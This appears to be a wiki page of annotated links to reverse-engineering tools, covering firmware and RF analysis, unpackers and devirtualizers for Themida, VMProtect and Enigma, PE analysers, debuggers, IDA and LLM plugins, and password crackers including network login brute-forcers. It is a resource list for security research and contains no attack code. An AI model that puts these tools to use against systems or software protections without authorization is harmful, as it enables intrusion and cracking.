&lt;br /&gt;
====RF Signals Analysis====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/jopohl/urh Universal Radio Hacker] - tool to analyze and extract data from SDR-captured radio signals (especially pilots, [[Wikipedia:ISM_radio_band|ISM RF]] devices, etc). See youtube for tutorials and examples.&lt;br /&gt;
&lt;br /&gt;
*[https://www.gnuradio.org/ GNU Radio]  - toolkit that provides signal processing blocks to implement software-defined radios and signal processing systems.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/cjcliffe/CubicSDR CubicSDR] - is a cross-platform Software-Defined Radio application which allows you to navigate the radio spectrum and demodulate any signals you might discover.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/audacity/audacity Audacity] - is a audio editor that can be used to cleanup the radio waves captured by a [[Wikipedia:Software-defined_radio|SDR]] or Software Defined Radio. (Example: Start Audacity -&amp;gt; Import –&amp;gt; Raw Data -&amp;gt; Radio Wave File)&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
====Firmware Analysis====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ReFirmLabs/binwalk binwalk]  - Binwalk is a fast, easy to use tool for analyzing, reverse engineering, and extracting firmware images.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/attify/firmware-analysis-toolkit FAT] - is a toolkit built in order to help security researchers analyze and identify vulnerabilities in IoT and embedded device firmware.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/e-m-b-a/emba EMBA] - is designed as the central firmware analysis tool for penetration testers and product security teams. It supports the complete security analysis process starting with firmware extraction, doing static analysis and dynamic analysis via emulation and finally generating a web report.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/rampageX/firmware-mod-kit Firmware Modification Kit] - is a collection of scripts and utilities to extract and rebuild linux based firmware images.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/craigz28/firmwalker Firmwalker] - is a script for searching the extracted firmware file system for goodies!&lt;br /&gt;
&lt;br /&gt;
====Setup Extractors / Overlay Unpackers / Virtualization Wrappers====&lt;br /&gt;
&lt;br /&gt;
*[https://innounp.sourceforge.net/ innounp] - the Inno Setup Unpacker.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/Bioruebe/UniExtract2 Universal Extractor 2 (UniExtract2)] -  is a tool designed to extract files from any type of extractable file.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/activescott/lessmsi lessmsi] - a tool to view and extract the contents of an Windows Installer (.msi) file.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/crackinglandia/fuu FUU] - [F]aster [U]niversal [U]npacker.&lt;br /&gt;
&lt;br /&gt;
=====Themida Reverse Engineering=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ergrelet/themida-unmutate themida-unmutate] - is a static deobfuscator for Themida, WinLicense and Code Virtualizer 3.x's mutation-based obfuscation.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/sodareverse/TDE TDE] - is a devirtualization engine for Themida. Supported FISH VMA versions: 2.2.5.0, 2.2.6.0, 2.2.7.0.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ergrelet/unlicense unlicense] - is a dynamic unpacker and import fixer for Themida/WinLicense 2.x and 3.x mostly used for malware-analysis.&lt;br /&gt;
&lt;br /&gt;
=====VMProtect Reverse Engineering=====&lt;br /&gt;
&lt;br /&gt;
======VMProtect 2======&lt;br /&gt;
&lt;br /&gt;
*[https://git.back.engineering/vmp2/ vmp2] - Resources provided by Back Engineering Labs regarding VMProtect 2 Reverse Engineering (x64 PE Only).&lt;br /&gt;
*vmemu (VMProtect 2 Virtual Machine Handler Emulation)&lt;br /&gt;
*vmassembler (VMProtect 2 Virtual Instruction Assembler)&lt;br /&gt;
*vmprofiler (VMProtect 2 Virtual Machines Profiler Library)&lt;br /&gt;
*vmprofiler-cli (VMProtect 2 CLI Virtual Machine Information Displayer)&lt;br /&gt;
*vmhook (VMProtect 2 Virtual Machine Hooking Library)&lt;br /&gt;
*vmprofiler-qt (VMProtect 2 Qt Virtual Instruction Inspector)&lt;br /&gt;
*um-hook (VMProtect 2 Usermode Virtual Instruction Hook Demo)&lt;br /&gt;
*vmdevirt (VMProtect Devirtualization)&lt;br /&gt;
&lt;br /&gt;
======VMProtect 3======&lt;br /&gt;
&lt;br /&gt;
*[https://git.back.engineering/vmp3/ vmp3] - Resources provided by Back Engineering Labs regarding VMProtect 3 Reverse Engineering (x64 PE Only).&lt;br /&gt;
*vmdevirt (VMProtect 3 Static Devirtualization)&lt;br /&gt;
*vmprofiler (VMProtect 3 Virtual Machines Profiler Library)&lt;br /&gt;
*vmemu (VMProtect 3 Virtual Machine Handler Emulation)&lt;br /&gt;
&lt;br /&gt;
=====Code Virtualizer (Oreans Technologies)=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/pakt/decv devc] - ia s decompiler for Code Virtualizer 1.3.8 (Oreans).&lt;br /&gt;
*[https://gdtr.wordpress.com/2012/10/03/decv-a-decompiler-for-code-virtualizer-by-oreans/ decv] - [blog post] a decompiler for Code Virtualizer by Oreans.&lt;br /&gt;
*[https://github.com/67-6f-64/AntiOreans-CodeDevirtualizer AntiOreans-CodeDevirtualizer] - is a proof-of-concept devirtualization engine for Themida/Oreans-CodeDevirtualizer.&lt;br /&gt;
&lt;br /&gt;
=====Enigma Protector=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/mos9527/evbunpack evbunpack] - is a Enigma Virtual Box Unpacker. Supported versions: 11.00, 10.70, 9.70, and 7.80.&lt;br /&gt;
&lt;br /&gt;
======OllyDbg Scripts======&lt;br /&gt;
*[https://github.com/ThomasThelen/OllyDbg-Scripts/blob/master/Enigma/Enigma%20Protector%201.90%20-%203.xx%20Alternativ%20Unpacker%20v1.0.txt Enigma Protector 1.90–3.xx Unpacker]&lt;br /&gt;
*[https://github.com/ThomasThelen/OllyDbg-Scripts/blob/master/Enigma/Enigma%20Protector%204.xx%20VM%20API%20Fixer%20v0.5.0.txt Enigma Protector 4.xx VM API Fixer]&lt;br /&gt;
&lt;br /&gt;
=====Generic Code Virtualizer=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/jnraber/VirtualDeobfuscator VirtualDeobfuscator] - is a reverse engineering tool for virtualization wrappers.&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Toolkit AIO====&lt;br /&gt;
=====Windows‑focused=====&lt;br /&gt;
*[https://github.com/Jakiboy/ReVens ReVens] - is a Windows-based Reverse Engineering Toolkit &amp;quot;All-In-One&amp;quot;, Built for Security (Malware analysis, Penetration testing) &amp;amp; Educational purposes.&lt;br /&gt;
*[https://github.com/mentebinaria/retoolkit retoolkit] - is a collection of tools you may like if you are interested in reverse engineering and/or malware analysis on x86 and x64 Windows systems.&lt;br /&gt;
*[https://github.com/byte2mov/re-kit-2.0 re-kit 2.0] - is a reverse engineering toolkit made for fighting malware and analyzing programs.&lt;br /&gt;
*[https://github.com/zer0condition/ReverseKit ReverseKit] - is a comprehensive toolkit designed to aid reverse engineers in the process of dynamic RE.&lt;br /&gt;
&lt;br /&gt;
=====Android‑focused=====&lt;br /&gt;
*[https://github.com/RevEngiSquad/revengi-app RevEngi] - is a all-in-one toolkit for reverse engineering: Smali Grammar, DexRepair, Flutter Analysis and much more...&lt;br /&gt;
&lt;br /&gt;
====Binary PE Analysis / Editor (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[https://web.archive.org/web/20210331144912/https://protectionid.net/ ProtectionID] - Great little tool to scan a Windows binary payload for overlays and packers.  [[Media:ProtectionId.690.December.2017.zip]] [https://www.virustotal.com/gui/file/26c54eb376183d508ee129531728f9e01d30f0df29d7621f390e8f0ea6a1c79c/community VT link], pw: recessim.com&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/horsicq/Detect-It-Easy Detect-It-Easy] - abbreviated &amp;quot;DIE&amp;quot; is a program for determining types of files. &amp;quot;DIE&amp;quot; is a cross-platform application, apart from Windows version there are also available versions for Linux and Mac OS.&lt;br /&gt;
&lt;br /&gt;
*[https://www.mitec.cz/exe.html MiTeC Portable Executable Reader/Explorer] - is a tool that reads and displays executable file properties and structures. It is compatible with PE32 (Portable Executable), PE32+ (64bit), NE (Windows 3.x New Executable) and VxD (Windows 9x Virtual Device Driver) file types. .NET executables are supported too.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/ExeinfoASL/ASL ExeInfoPe] - is a tool that can detect packers, compilers, protectors, .NET obfuscators, PUA applications.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/hasherezade/pe-bear PE-bear] - is a Portable Executable reversing tool with a friendly GUI using the Capstone Engine and is Open Source!&lt;br /&gt;
&lt;br /&gt;
*[https://ntcore.com/?page_id=388 CFF Explorer] - is a PE editor called CFF Explorer and a process viewer with a lot of features.&lt;br /&gt;
&lt;br /&gt;
*[https://web.archive.org/web/20220331063153/http://www.rdgsoft.net/ RDG Packer Detector] - is a detector for packers, cryptors, compilers, installers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/petoolse/petools/ PE Tools] - is a portable executable (PE) manipulation toolkit.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/zedxxx/rccextended RccExtended] - is a resource compiler and decompiler for Qt binaries (files with the .rcc extension).&lt;br /&gt;
&lt;br /&gt;
====Hex Editors====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/WerWolv/ImHex ImHex] - is a Hex Editor for Reverse Engineers, Programmers and people who value their retinas when working at 3 AM.&lt;br /&gt;
&lt;br /&gt;
*[https://mh-nexus.de/en/hxd/ HxD] - is a carefully designed and fast hex editor which, additionally to raw disk editing and modifying of main memory (RAM), handles files of any size.&lt;br /&gt;
&lt;br /&gt;
*[https://www.x-ways.net/winhex/ WinHex] - is in its core a universal hexadecimal editor, particularly helpful in the realm of computer forensics, data recovery, low-level data processing, and IT security.&lt;br /&gt;
&lt;br /&gt;
*[https://malcat.fr/index.html MalCat] - is a feature-rich hexadecimal editor / disassembler for Windows and Linux targeted to IT-security professionals. Inspect more than 40 binary file formats, dissassemble and decompile different CPU architectures, extract embedded files and scan for Yara signatures or anomalies in a fast and easy-to-use graphical interface.&lt;br /&gt;
&lt;br /&gt;
====Pattern Matching / Pattern Searching====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/VirusTotal/yara Yara] - is a pattern matching swiss knife in the IT Security Researchers branch.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/BurntSushi/ripgrep ripgrep (rg)] - is a line-oriented search tool that recursively searches the current directory for a regex pattern. By default, ripgrep will respect gitignore rules and automatically skip hidden files/directories and binary files.&lt;br /&gt;
&lt;br /&gt;
*[https://linux.die.net/man/1/grep grep] - searches the named input FILEs (or standard input if no files are named, or if a single hyphen-minus (-) is given as file name) for lines containing a match to the given PATTERN. By default, grep prints the matching lines.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/stefankueng/grepWin grepWin] -  is a simple yet powerful search and replace tool which can use regular expressions to do its job. This allows to do much more powerful searches and replaces.&lt;br /&gt;
&lt;br /&gt;
*[https://astrogrep.sourceforge.net/  AstroGrep] - is a Microsoft Windows grep utility. Grep is a UNIX command-line program which searches within files for keywords. AstroGrep supports regular expressions, versatile printing options, stores most recently used paths and has a &amp;quot;context&amp;quot; feature which is very nice for looking at source code.&lt;br /&gt;
&lt;br /&gt;
====Comparison Tools (Binary differences)====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/joxeankoret/diaphora Diaphora] - is the most advanced Free and Open Source program diffing tool.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/google/bindiff BinDiff] - is an open-source comparison tool for binary files to quickly find differences and similarities in disassembled code.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/clearbluejar/ghidriff Ghidriff] - is a command-line binary diffing tool that uses Ghidra to identify differences between two binaries.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/quarkslab/qbindiff QBinDiff] - is an experimental binary diffing tool addressing the diffing as a Network Alignement Quadratic Problem.&lt;br /&gt;
&lt;br /&gt;
*[https://book.rada.re/tools/radiff2/binary_diffing.html radiff2] - is a binary diffing utility that is part of the radare2 framework.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/bmaia/binwally binwally] - is a binary and directory tree comparison tool using Fuzzy Hashing concept (ssdeep).&lt;br /&gt;
&lt;br /&gt;
====IAT Reconstructors (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/x64dbg/Scylla NtQuery Scylla] - is a Windows Portable Executable imports reconstructor Open Source and part of x64dbg.&lt;br /&gt;
&lt;br /&gt;
====Process Monitors (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/winsiderss/systeminformer/ System Informer] - is a  free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware.&lt;br /&gt;
&lt;br /&gt;
*[https://docs.microsoft.com/en-us/sysinternals/downloads/process-explorer Process Explorer (by Microsoft Sysinternals)] - is an advanced system monitoring tool by Microsoft Sysinternals that provides detailed real-time information about running processes, including their dependencies, resource usage, and open handles or DLLs.&lt;br /&gt;
&lt;br /&gt;
*[https://docs.microsoft.com/en-us/sysinternals/downloads/procmon Process Monitor (by Microsoft Sysinternals)] - is a real-time monitoring tool by Microsoft Sysinternals that captures and displays detailed system activity related to file system, registry, process, and thread operations for advanced troubleshooting and diagnostics.&lt;br /&gt;
&lt;br /&gt;
====Process Dumpers (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/glmcdona/Process-Dump Process Dump (pd)] - is a Windows reverse-engineering tool to dump malware memory components back to disk for analysis. It uses an aggressive import reconstruction approach to make analysis easier, and supports 32 and 64 bit modules. Dumping of regions without PE headers is supported and in these cases PE headers and import tables will automatically be generated.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/EquiFox/KsDumper KsDumper] - is a tool for dumping processes using the power of kernel space.&lt;br /&gt;
&lt;br /&gt;
====API monitoring ring3 (Windows)====&lt;br /&gt;
&lt;br /&gt;
*[http://jacquelin.potier.free.fr/winapioverride32/ WinAPIOverride] - is an advanced api monitoring software for 32 and 64 bits processes. You can monitor and/or override any function of a process.&lt;br /&gt;
&lt;br /&gt;
*[http://www.rohitab.com/apimonitor Rohitab API Monitor] - is a free tool that lets you monitor and control API calls made by applications and services. Its a powerful tool for seeing how applications and services work or for tracking down problems that you have in your own applications.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/hasherezade/tiny_tracer tiny_tracer] - is a Pin Tool for tracing API calls including parameters of selected functions, selected instructions RDTSC, CPUID, INT, inline system calls inc parameters of selected syscalls and more.&lt;br /&gt;
&lt;br /&gt;
====Hashing &amp;amp; Crypto====&lt;br /&gt;
These tools are used in authorized security audits to uncover flaws in hashing or cryptographic logic, as well as to detect backdoors or undocumented features. They are also commonly employed in crackme challenges to help improve reverse engineering skills.&amp;lt;br&amp;gt;&lt;br /&gt;
It includes support for a wide range of cryptographic algorithms and hash functions, such as AES, Blowfish, TEA family, RC2–RC6, Twofish, DES variants, MARS, and hashing standards like SHA-2, RIPEMD, TIGER, WHIRLPOOL, CRC variants, and HAVAL with multiple rounds and output lengths.&lt;br /&gt;
&lt;br /&gt;
*[https://webscene.ir/distro/AT4RE/Tools Keygener Assistant v2.1.2] [[File:Keygener Assistant v2.1.2.zip]] - is a tool that combines several functions to facilitate the task and save time during the analysis of an algorithm.&lt;br /&gt;
&lt;br /&gt;
*[https://webscene.ir/tools/show/SnD-Reverser-Tool-1.4 SnD Reverser Tool 1.4 (404)] [[File:SnD Reverser Tool 1.4.zip]] - is a cryptographic companion tool designed to support reverse engineering efforts, offering a wide range of features including hash function analysis, base conversions, and support for various encryption standards.&lt;br /&gt;
&lt;br /&gt;
====Password cracking====&lt;br /&gt;
Most embedded devices, whether connected via wireless or wired interfaces, store credentials such as local account passwords, service keys, and API keys. If you need to evaluate or audit the cryptographic mechanisms protecting these credentials, password-cracking tools are essential.&lt;br /&gt;
&lt;br /&gt;
Offline&lt;br /&gt;
*[https://github.com/hashcat/hashcat Hashcat] - is world's fastest and most advanced password recovery utility, supports many hash algorithms (MD5, SHA1, NTLM, bcrypt, etc).&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/openwall/john John the Ripper jumbo] - is a advanced offline password cracker, which supports hundreds of hash and cipher types, and runs on many operating systems, CPUs, GPUs, and even some FPGAs.&lt;br /&gt;
&lt;br /&gt;
Online (network based bruteforce in LAN).&lt;br /&gt;
*[https://github.com/vanhauser-thc/thc-hydra Hydra / THC Hydra] - is a parallelized network login cracker built into various operating systems like Kali Linux, Parrot and other major penetration testing environments. It was created as a proof of concept tool, for security researchers to demonstrate how easy it can be to crack logins.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/jmk-foofus/medusa Medusa] - is a speedy, parallel, and modular, login brute-forcer.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/lanjelot/patator Patator] - is a multi-purpose brute-forcer, with a modular design and a flexible usage. Also support various offline brute force methods like; unzip_pass, keystore_pass, umbraco_crack.&lt;br /&gt;
&lt;br /&gt;
====Virtualization technology (host isolation) or sandboxes====&lt;br /&gt;
&lt;br /&gt;
*[https://www.vmware.com/ VMware] - is a virtualization and cloud computing software provider based in Palo Alto, Calif.&lt;br /&gt;
&lt;br /&gt;
*[https://www.virtualbox.org/ Oracle VM VirtualBox] - is a powerful x86 and AMD64/Intel64 virtualization product for enterprise as well as home use. Not only is VirtualBox an extremely feature rich, high performance product for enterprise customers, it is also the only professional solution that is freely available as Open Source Software under the terms of the GNU General Public License (GPL) version 3.&lt;br /&gt;
&lt;br /&gt;
*[https://linux-kvm.org/page/Main_Page KVM (for Kernel-based Virtual Machine)] - is a full virtualization solution for Linux on x86 hardware containing virtualization extensions (Intel VT or AMD-V). It consists of a loadable kernel module, kvm.ko, that provides the core virtualization infrastructure and a processor specific module, kvm-intel.ko or kvm-amd.ko.&lt;br /&gt;
&lt;br /&gt;
*[https://www.qemu.org/ QEMU] - A generic and open source machine emulator and virtualizer.&lt;br /&gt;
&lt;br /&gt;
*[https://www.proxmox.com/en/proxmox-virtual-environment/overview Proxmox] - is a complete, open-source server management platform for enterprise virtualization. It tightly integrates the KVM hypervisor and Linux Containers (LXC), software-defined storage and networking functionality, on a single platform.&lt;br /&gt;
&lt;br /&gt;
*[https://www.redhat.com/en/technologies/cloud-computing/openshift/virtualization Red Hat OpenShift Virtualization] - Red Hat® OpenShift® Virtualization, a feature of Red Hat OpenShift, allows IT teams to run virtual machines alongside containers on the same platform, simplifying management and improving time to production. &lt;br /&gt;
&lt;br /&gt;
*[https://xenproject.org/ Xen Project] - The Xen Project focuses on revolutionizing virtualization by providing a versatile and powerful hypervisor that addresses the evolving needs of diverse industries.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/firecracker-microvm/firecracker Firecracker] - is an open source virtualization technology that is purpose-built for creating and managing secure, multi-tenant container and function-based services that provide serverless operational models.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/sandboxie-plus/Sandboxie Sandboxie] - is a sandbox-based isolation software for 32-bit and 64-bit Windows NT-based operating systems. It creates a sandbox-like isolated operating environment in which applications can be run or installed without permanently modifying local &amp;amp; mapped drives or the Windows registry.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/kpcyrd/boxxy-rs boxxy-rs] - is a linkable sandbox explorer. &amp;quot;If you implement boundaries and nobody is around to push them, do they even exist?&amp;quot;. Have you ever wondered how your sandbox looks like from the inside? Tempted to test if you can escape it, if only you had a shell to give it a try?&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
====Dynamic &amp;amp; Static Analysis (mostly '''unmanged''' binaries)====&lt;br /&gt;
&lt;br /&gt;
=====Interactive Disassemblers ('''static analysis''')=====&lt;br /&gt;
&lt;br /&gt;
*[https://binary.ninja/ Binary Ninja] - reverse-engineering platform that can disassemble a binary and display the disassembly in linear or graph views.&lt;br /&gt;
&lt;br /&gt;
::Binary Ninja Scripts/Plugins/Extension&lt;br /&gt;
:::*[https://github.com/ergrelet/themida-unmutate-bn themida-unmutate-bn] - a Binary Ninja plugin to deobfuscate Themida, WinLicense and Code Virtualizer 3.x's mutation-based obfuscation.&lt;br /&gt;
:::*[https://github.com/ergrelet/themida-spotter-bn themida-spotter-bn] - a Binary Ninja plugin to detect Themida, WinLicense and Code Virtualizer's obfuscated code locations.&lt;br /&gt;
&lt;br /&gt;
*[https://www.nsa.gov/resources/everyone/ghidra/ Ghidra] - Ghidra is an open source software reverse engineering (SRE) framework developed by NSA's [https://www.nsa.gov/what-we-do/research/ Research] Directorate for NSA's [https://www.nsa.gov/what-we-do/cybersecurity/ cybersecurity mission].&lt;br /&gt;
&lt;br /&gt;
::Ghidra Scripts/Plugins/Extension&lt;br /&gt;
:::*[https://github.com/AllsafeCyberSecurity/awesome-ghidra Scripts/Plugins/Extension] - A curated list of awesome Ghidra materials.&lt;br /&gt;
:::*[https://github.com/grayhatacademy/ghidra_scripts Arm &amp;amp; MIPS scripts] - ARM &amp;amp; MIPS ROP finder, Call Chain, Codatify, Fluorescence, Function Profiler, Leaf Blower, Local Cross Reference, and more.&lt;br /&gt;
:::*[https://github.com/DSecurity/efiSeek efiSeek] - is a tool that aids in identifying and analyzing EFI (Extensible Firmware Interface) binaries by locating key EFI structures and metadata within firmware images.&lt;br /&gt;
:::*Qt Framework&lt;br /&gt;
::::*[https://github.com/diommsantos/QtREAnalyzer/ QtREAnalyzer] - is a extension to reverse-engineer Qt binaries. Works only with Run-Time Type Information (RTTI) enabled &amp;amp; compiled with MSVC.&lt;br /&gt;
::::*[https://github.com/OSUSecLab/QtRE QtRE] - is a headless analyzer tailored for Qt binary analysis.&lt;br /&gt;
&lt;br /&gt;
*[https://www.hex-rays.com/products/ida/ IDA] - The IDA Disassembler and Debugger is an interactive, programmable, extensible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X.&lt;br /&gt;
&lt;br /&gt;
::IDA Scripts/Plugins/Extension&lt;br /&gt;
:::*[https://github.com/gdelugre/ida-arm-system-highlight IDA ARM] - This script will give you the list of ARM system instructions used in your IDA database. This is useful for locating specific low-level pieces of code (setting up the MMU, caches, fault handlers, etc.).&lt;br /&gt;
:::*[https://github.com/google/bindiff BinDiff] - is a Open Source comparison tool for binary files, that assists vulnerability researchers and engineers to quickly find differences and similarities in disassembled code.&lt;br /&gt;
:::*[https://www.keystone-engine.org/keypatch/ Keypatch] - A multi-architeture assembler for IDA. Keypatch allows you enter assembly instructions to directly patch the binary under analysis. Powered by Keystone engine.&lt;br /&gt;
:::*[https://github.com/onethawt/idastealth IDAStealth] - is a plugin which aims to hide the IDA debugger from most common anti-debugging techniques. The plugin is composed of two files, the plugin itself and a dll which is injected into the debugger as soon as the debugger attaches to the process.&lt;br /&gt;
:::*[https://github.com/iphelix/ida-sploiter ida-sploiter] - is a exploit development and vulnerability research tool. Some of the plugin's features include a powerful ROP gadgets search engine, semantic gadget analysis and filtering, interactive ROP chain builder, stack pivot analysis, writable function pointer search, cyclic memory pattern generation and offset analysis, detection of bad characters and memory holes, and many others.&lt;br /&gt;
:::*[https://github.com/danigargu/IDAtropy IDAtropy] -is a plugin for Hex-Ray's IDA Pro designed to generate charts of entropy and histograms using the power of idapython and matplotlib&lt;br /&gt;
:::*[https://github.com/grayhatacademy/ida/tree/master/plugins/localxrefs Localxrefs] - Finds references to any selected text from within the current function.&lt;br /&gt;
:::*[https://github.com/a1ext/labeless Labeless] - is a plugin system for dynamic, seamless and realtime synchronization between IDA Database and Olly. Labels, function names and global variables synchronization is supported. Olly and x64dbg are supported.&lt;br /&gt;
:::*[https://www.coresecurity.com/core-labs/open-source-tools/turbodiff-cs Turbodiff] - is a binary diffing tool developed as an IDA plugin. It discovers and analyzes differences between the functions of two binaries.&lt;br /&gt;
::::*Oreans CV scripts&lt;br /&gt;
:::::*[[Media:Oreans anti debug blacklist identifier.zip]] - [Python script] Oreans - Anti-Debugger Blacklist Identifier; Tested on 2.3.0.0 - 2.4.6.0.&lt;br /&gt;
:::::*[[Media:Oreans macro entry identifier biased.zip]] - [Python script] Oreans - Macro Entry Identifier (Biased); Tested on 2.3.0.0 - 3.0.8.0.&lt;br /&gt;
:::::*[[Media:Oreans macro entry identifier reversal.zip]] - [Python script] Oreans - Macro Entry Identifier (Reversal); Tested on 2.3.0.0 - 3.0.8.0.&lt;br /&gt;
:::*[https://github.com/onethawt/idaplugins-list A list of IDA Plugins PART1 (click here for more)] - A large list/collection of plugins for IDA.&lt;br /&gt;
:::*[https://github.com/vmallet/ida-plugins A list of IDA Plugins PART2 (click here for more)] - A large list/collection of plugins for IDA.&lt;br /&gt;
:::*[https://github.com/fr0gger/awesome-ida-x64-olly-plugin A list of IDA Plugins PART3 (click here for more)] - A large list/collection of plugins for IDA.&lt;br /&gt;
::IDA LLM Plugins&lt;br /&gt;
:::*Local (quantized LLMs Q4/INT4)&lt;br /&gt;
::::*[https://github.com/atredispartners/aidapal aiDAPal] - is an IDA Pro plugin that uses a locally running LLM that has been fine-tuned for Hex-Rays pseudocode to assist with code analysis.&lt;br /&gt;
::::*[https://github.com/0xdea/oneiromancer oneiromancer] - is a reverse engineering assistant that uses a locally running LLM to aid with pseudo-code analysis.&lt;br /&gt;
:::*Cloud&lt;br /&gt;
::::*[https://github.com/JusticeRage/Gepetto Gepetto] - is a Python plugin which uses various large language models to provide meaning to functions decompiled by IDA Pro (≥ 7.4). It can leverage them to explain what a function does, and to automatically rename its variables.&lt;br /&gt;
::::*[https://github.com/Antelcat/ida_copilot ida_copilot] - is a ChatGPT plugin for IDA Pro, where the cutting-edge capabilities of OpenAI's GPT models meet the powerful disassembly and debugging features of IDA Pro.&lt;br /&gt;
::::*[https://github.com/ke0z/VulChatGPT VulChatGPT] - is an plugin for Hex-Rays decompiler which integrates with the OpenAI API (ChatGPT) to assist in vulnerability discovery during reverse-engineering.&lt;br /&gt;
::::*[https://github.com/RevEngAI/reai-ida RevEng.AI] - is a plugin by RevEng.AI that integrates with their AI-driven analysis platform to let you upload binaries, fetch semantic summaries, auto‑rename functions based on similar binaries, sync analyses, and even perform AI‑based decompilation.&lt;br /&gt;
&lt;br /&gt;
*[https://codisec.com/veles/ Veles] - Open source tool for binary data analysis (No longer actively developed).&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/uxmal/reko Reko] - Reko is a binary decompiler for static analysis (ARM, x86-64, M68K, Aarch65, RISC-V and dotnet)&lt;br /&gt;
&lt;br /&gt;
*[https://rada.re/ radare2] and [https://rizin.re/ Rizin] - radare2 and its fork Rizin are open source reverse engineering frameworks. Both are primarily used through a shell-like text UI, but also offer GUIs called [https://rada.re/n/iaito.html iaito] and [https://cutter.re/ Cutter] respectively.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/rizinorg/cutter Cutter] - is a free and open-source reverse engineering platform powered by rizin. It aims at being an advanced and customizable reverse engineering platform while keeping the user experience in mind. Cutter is created by reverse engineers for reverse engineers.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/joelpx/plasma Plasma] - Plasma is an interactive disassembler for x86/ARM/MIPS. It can generates indented pseudo-code with colored syntax.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/wisk/medusa Medusa] - is a disassembler designed to be both modular and interactive. It runs on Windows and Linux, it should be the same on OSX.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/capstone-engine/capstone Capstone] - is a disassembly/disassembler framework for ARM, ARM64 (ARMv8), BPF, Ethereum VM, M68K, M680X, Mips, MOS65XX, PPC, RISC-V(rv32G/rv64G), SH, Sparc, SystemZ, TMS320C64X, TriCore, Webassembly, XCore and X86.&lt;br /&gt;
&lt;br /&gt;
=====Active Disassemblers or Debuggers ('''dynamic analysis''')=====&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/vivisect/vivisect Vivisect] - Vivisect binary analysis framework.  Includes Disassembler, Debugger, Emulation and Symbolik analysis engines.  Includes built-in Server and Shared-Workspace functionality.  Runs interactive or headless, programmable, extensible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X (Pure-Python, using ctypes to access underlying OS debug mechanism).  Supports RevSync via plugin, allowing basic collaboration with Binja, Ghidra, and IDA.  Criticisms (from a core dev): &amp;quot;Graph View could use some work, slower than Binja and IDA (due to Python), documentation like an OpenSource Project... but we keep working to make it better.  PR's and suggestions welcome.&amp;quot;  Best installed via Pip:  &amp;lt;code&amp;gt;python3 -m pip install vivisect&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
*[https://www.immunityinc.com/products/debugger/ Immunity Debugger] - is a powerful new way to write exploits, analyze malware, and reverse engineer Windows binary files (python support)&lt;br /&gt;
&lt;br /&gt;
*[https://www.hopperapp.com/ Hopper] - Hopper can use LLDB or GDB, which lets you debug and analyze the binary in a dynamic way (only for Mac and Linux hosts, not for mobile devices).&lt;br /&gt;
&lt;br /&gt;
*[https://www.ollydbg.de/ OllyDbg] - is a powerful, user-friendly 32-bit Windows debugger focused on binary analysis, reverse engineering, and malware research, featuring dynamic code analysis and a rich plugin ecosystem.&lt;br /&gt;
&lt;br /&gt;
::OllyDbg Scripts/Plugins/Mods&lt;br /&gt;
:::*[https://github.com/ThomasThelen/OllyDbg-Scripts OllyDbg-Scripts] - is a curated list containing many older x86 OllyDbg scripts.&lt;br /&gt;
&lt;br /&gt;
*[https://x64dbg.com/ x64dbg] - Is a powerful Open Source Ollydbg replacement with a User Interface very similar to Ollydbg also x64dbg as the name states offers x64 support.&lt;br /&gt;
&lt;br /&gt;
::x64dbg Plugins/Integrations/Templates&lt;br /&gt;
:::*[https://github.com/x64dbg/x64dbg/wiki/Plugins x64dbg's Wiki] - is a wiki of Integrations and Plugins of x64dbg debugger.&lt;br /&gt;
